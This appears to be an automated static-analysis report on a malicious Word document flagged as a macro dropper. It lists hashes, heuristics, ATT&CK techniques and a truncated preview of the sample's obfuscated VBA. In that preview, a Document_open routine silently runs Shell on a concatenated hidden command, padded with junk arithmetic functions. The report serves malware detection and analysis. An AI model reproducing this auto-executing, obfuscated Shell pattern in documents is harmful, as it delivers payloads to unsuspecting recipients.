Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4369e3f339cb1b2e…

MALICIOUS

Office (OLE)

322.0 KB Created: 2018-07-19 18:16:00 Authoring application: Microsoft Office Word First seen: 2018-07-23
MD5: ab623b1e6c0ee36bbde18a3b30f94e65 SHA-1: 38db080ced46c59f1a3ed87ad01e087b52601de3 SHA-256: 4369e3f339cb1b2e46c0dd9d35903a7afa34664c3b279c5d4904434d4f32681e
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. A critical heuristic firing indicates the presence of a Shell() call within the VBA code, which is commonly used to download and execute additional malicious payloads. The ClamAV detection name 'Doc.Dropper.Agent-6615994-0' further supports its nature as a dropper. The document likely functions as a spearphishing attachment designed to deliver a secondary stage.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-6615994-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6615994-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 39374 bytes
SHA-256: f65d9c60c0942d8efcaaf82648fdc2f71abf78b91c81c3b7c763d27e46a1fda1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "mDWvoqoJDr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ZatXNNWErQnOJ()
On Error Resume Next
   vtRLdM = 83866 - njuGac - 59418 / kwnTdi / uPdklu * tmrEZS
   hoGXT = 95674 - zbNzHd - 70087 / LVsXK / DKYdEU * OjjEU
   ULEpQ = 21917 - RrVBL - 6398 / TInEGn / MGuOsl * UlJqn
   XaLDi = 78010 - KEiNZS - 73459 / kzofb / rXAiB * LzqCdU
   vhbBb = 98474 - CCMBT - 35782 / IAJCI / HEJaXa * zFLKY
End Function
Private Function sKvRdXtAljsd()
On Error Resume Next
   ldqka = 65105 - OafFDP - 53385 / mNLoNp / VnQDvN * XNEzcP
   rRBjSE = 50371 - ftainD - 42683 / ABpDoD / LzwRJ * kfjGaw
   OMRqBD = 30202 - ivMPIX - 50553 / nKVvvK / NmpET * ZBckc
   pzUdXG = 2528 - DsOcip - 79976 / HhvCK / bJhvo * dGXMq
   IcaTR = 12649 - XGjCjz - 96977 / MiMIHC / hiJssJ * BNtJwV
   bziHbl = 8057 - DDAsE - 20110 / ZKidXm / KwcSs * wUBmw
End Function
Private Function soozwUvicDjzb()
On Error Resume Next
   bDQtB = 91594 - YZuEW - 88835 / OGiIb / qBlYY * jVlGm
   TwRJD = 86518 - Mvziz - 78696 / dJROI / cRLslD * fbpNR
   NnFiF = 73853 - XrlkB - 83854 / vzhDE / ZkVumT * NrQvXk
   ljotcG = 62676 - alwoa - 91227 / BPulq / XDHBcE * jBkwm
   EwpCiW = 17387 - JVHQri - 64455 / GCvOpP / Ejkkp * wdrVT
   UwQEiM = 38697 - LzfUn - 26521 / UDpkB / fjszB * jZBBCd
End Function
Private Function NVKzYRLGi()
On Error Resume Next
   PztOHL = 37599 - CRJSm - 49280 / ajfMAD / Xnhnk * XNqODl
   RVtkj = 56717 - tGZXOL - 76549 / ajiGvA / SXMsv * IYBKYz
   EqMztO = 4897 - IjJAw - 18792 / OJkZr / EZuajV * QAHIq
   ttOKIT = 2188 - CTXmf - 40031 / SADnM / nuwSD * LEcKZm
   TGMdw = 87488 - wJjYQp - 10425 / Hiqdu / jBmiYN * psjQH
   iwurJ = 26924 - wwpjf - 54403 / wLCqw / FwPsEa * DaJzzO
End Function
Private Sub Document_open()
On Error Resume Next
   iriwh = 4258 - tEmPi - 61625 / YsLQlb / DMYlzW * EtzXXL
   DPLwj = 17310 - wnBLfT - 48343 / EDzLKi / czvsW * fPtSYc
   RVMiLn = 14175 - PrAiot - 26649 / zvHafF / hfipL * sHUTub
   dJKGQU = 47462 - YdpiHr - 94716 / kdqst / QjFDZL * NokEbu
   AVKsVV = 66734 - RMrEOj - 9854 / AwbmRu / qjGIt * KrBLaD
   nipWj = 84241 - NWHHzz - 17338 / Ezott / ANvMtL * FdjzHw
Shell "" + iwwQjshdfUTfQQ + iZAnNAomK + CVar("c") + ItHqiwIYzO + KvUQYDFPwwCtCu + GNCYvDalp + uicNpQGbFQL + AZGzXEwm + PkZDi + JDkKX + RGPqGGWAc + dCwvTtaTD + jzurokd + ibMUE + IsKtXFtlU + HBjWF + khMAQMimJ + wjfbIVTrn + YhjlwGSJ + SfaPArMjrsc + NjbjoN + YGSRdAC + YYtwLXKhFLU, 0
   MpUHU = 81063 - ocaIzX - 41262 / zRJna / jUhNjd * swSKq
End Sub
Private Function RSTAwnDN()
On Error Resume Next
   HauVCw = 55928 - uproO - 69551 / owFlD / OjRERw * OZZzHZ
   jrbaIG = 8819 - HSErs - 23150 / uSYPd / BcvIDo * Lstir
   okrvl = 1998 - zzdEzR - 48287 / EufGm / XrUfQt * uzEZfT
   bapprk = 29775 - PzQAG - 63473 / wCUiJ / iZNui * aDDHXV
   fQEjw = 98223 - GFUAua - 88943 / XGjRRs / PVHjE * ZiRznC
End Function
Private Function zVfLOlwzlwn()
On Error Resume Next
   quEzuD = 9742 - lwXiYz - 93734 / WJncnP / zPmkz * pFssUP
   mNOoXn = 53727 - jVQhza - 64170 / FBAvZ / laZWnM * wWkruh
   ioCjli = 55888 - nunMr - 91341 / IwJNcr / wdbMu * WwQtcL
   EmLkr = 39991 - cpEUhJ - 56274 / CMiSr / fnaJS * zPrFwz
   QdEbQ = 14554 - brzWq - 35601 / mnZZwj / YEZnpw * dujfkT
End Function
Private Function PXTtmwwCs()
On Error Resume Next
   lSljsG = 13337 - iWJLAE - 23299 / rKTTdX / RzSLh * AdSziL
   lqvqzj = 51456 - WnKmC - 54348 / ziNrtn / mwZaG * LqhXw
   HIBiw = 87749 - KWEZif - 4042 / IwJRFK / oXGobi * KXqhBj
   NQzhS = 81596 - fAMsCd - 43369 / wfPQiL / cLJMB * AIBVM
   FDsMR = 53112 - NOWOzn - 72517 / VUuZa / Mjwmc * zJzQB
   YShhnc = 35586 - TrFKv - 81605 / QWANIT / ZuZAds * MVtUOS
   NLIlY = 6213 - ovOwI - 25137 / XHiwoh / LizcL * tnnMa
   ZiHImn = 5035 - HuAYf - 15690 / bbITqt / UwapLq * OGNMF
End Function
Private Function ivjhnYQdZzZmVk()
On Error Resume Next
   TKpIEZ = 32230 - VqwnTi - 68162 / MKvKm
... (truncated)